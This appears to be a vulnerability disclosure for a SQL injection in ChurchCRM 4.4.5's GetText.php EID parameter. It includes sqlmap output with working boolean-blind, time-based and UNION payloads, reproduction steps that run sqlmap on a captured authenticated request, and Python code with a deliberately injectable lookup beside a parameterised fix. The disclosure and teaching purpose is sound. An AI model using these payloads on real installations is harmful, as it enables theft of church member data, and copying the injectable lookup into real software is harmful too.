ChurchCRM 4.4.5 was discovered to contain a SQL injection vulnerability via the EID parameter at /churchcrm/GetText.php
sqlmap output (three injection techniques confirmed on the same parameter):

Parameter: EID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: EID=2 AND 5131=5131

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: EID=2 AND (SELECT 8794 FROM (SELECT(SLEEP(5)))vcYY)

    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: EID=-8266 UNION ALL SELECT CONCAT(0x716a626a71,0x4f4247535a686a694a597a48694d4e6c76515974547872624f6b4d6642564f764752694c7461526b,0x7176767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
Affected version: ChurchCRM 4.4.5 (https://github.com/ChurchCRM/CRM/releases/tag/4.4.5)
Steps to reproduce (an authenticated session is required; the steps below use an admin account):
1. Log in with admin credentials.
2. Go to "Events" (see the picture) and click "List Church Events".
3. Click "Sermon Text" for an event.
4. The link opens /churchcrm/GetText.php?EID=2.
5. Refresh the page and intercept the request with Burp.
6. Save the raw intercepted request, including its Cookie header, to a text file (GetText.req below). sqlmap replays the headers from this file, so the session cookie is what lets it reach the authenticated endpoint.
7. Run sqlmap against the saved request, testing only the EID parameter:
   sqlmap -r GetText.req -p EID
8. sqlmap reports EID as injectable, with the boolean-based blind, time-based blind and UNION query payloads listed in the output above.
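The mechanics behind the three sqlmap findings, as an added example that is not ChurchCRM's code: a constructed SQLite table stands in for the event record behind GetText.php?EID=2 (table and column names are assumptions), a deliberately injectable lookup reproduces the boolean-based blind oracle (true tail 5131=5131 versus false tail 5131=5132), a parameterised lookup shows the fix, and two helpers decode sqlmap's UNION payload quoted above (the hex literals are the marker strings sqlmap searches for in the response, and the SELECT list must have exactly 13 entries to match the original query).

```python
"""Added example (not ChurchCRM code): the mechanics behind the sqlmap findings above.

A stand-in SQLite table and a deliberately injectable lookup reproduce the
boolean-based blind oracle; a parameterised lookup shows the fix; two helpers
decode sqlmap's UNION payload. Table and column names are assumptions.
"""
import re
import sqlite3

# Constructed data standing in for the event record behind GetText.php?EID=2.
SCHEMA = """
CREATE TABLE events_event (event_id INTEGER PRIMARY KEY, event_title TEXT, event_text TEXT);
INSERT INTO events_event VALUES (1, 'Sunday Service', 'First sermon text');
INSERT INTO events_event VALUES (2, 'Midweek Service', 'Second sermon text');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, eid):
    """Assumed injectable pattern: EID pasted straight into the WHERE clause."""
    sql = "SELECT event_text FROM events_event WHERE event_id=" + eid
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def safe_lookup(conn, eid):
    """Hardened form: reject anything but digits, then bind the value."""
    if not re.fullmatch(r"[0-9]+", eid):
        raise ValueError("EID must be an integer")
    row = conn.execute(
        "SELECT event_text FROM events_event WHERE event_id=?", (int(eid),)
    ).fetchone()
    return row[0] if row else None


def boolean_blind_oracle(lookup, conn, eid="2"):
    """sqlmap's first finding: an always-true tail (5131=5131) and an always-false
    tail must produce different pages if EID reaches the WHERE clause unquoted."""
    true_page = lookup(conn, f"{eid} AND 5131=5131")
    false_page = lookup(conn, f"{eid} AND 5131=5132")
    return true_page != false_page


def hardened_rejects(conn, eid="2"):
    """True when the parameterised lookup refuses the injected tail outright."""
    try:
        boolean_blind_oracle(safe_lookup, conn, eid)
    except ValueError:
        return True
    return False


# UNION payload quoted from the sqlmap output above.
UNION_PAYLOAD = (
    "-8266 UNION ALL SELECT CONCAT(0x716a626a71,"
    "0x4f4247535a686a694a597a48694d4e6c76515974547872624f6b4d6642564f764752694c7461526b,"
    "0x7176767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"
)


def decode_union_marker(payload):
    """Decode the hex literals in CONCAT(): sqlmap brackets a random string with two
    fixed marker strings and confirms the UNION when that text appears in the page."""
    hexes = re.findall(r"0x([0-9a-fA-F]+)", payload)
    return "".join(bytes.fromhex(h).decode("ascii") for h in hexes)


def count_union_columns(payload):
    """Count top-level SELECT-list entries; it must equal the original query's
    column count (13 in sqlmap's title) or MySQL rejects the UNION."""
    select_list = re.search(r"UNION ALL SELECT (.*?)-- -", payload).group(1)
    depth, cols = 0, 1
    for ch in select_list:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        elif ch == "," and depth == 0:
            cols += 1
    return cols


def union_confirmed(payload, body):
    """The check sqlmap makes on the HTTP response body for the UNION technique."""
    return decode_union_marker(payload) in body


if __name__ == "__main__":
    db = open_db()
    print("vulnerable lookup injectable:", boolean_blind_oracle(vulnerable_lookup, db))
    print("hardened lookup rejects payload:", hardened_rejects(db))
    print("UNION marker:", decode_union_marker(UNION_PAYLOAD))
    print("UNION columns:", count_union_columns(UNION_PAYLOAD))
```

The boolean oracle is what makes the vulnerability exploitable without any error message: the page either contains the sermon text or does not, so any condition can be asked one bit at a time. The parameterised lookup closes that channel because the tail never reaches the SQL parser; the digit check in front of it also keeps the time-based SLEEP() payload from ever being executed.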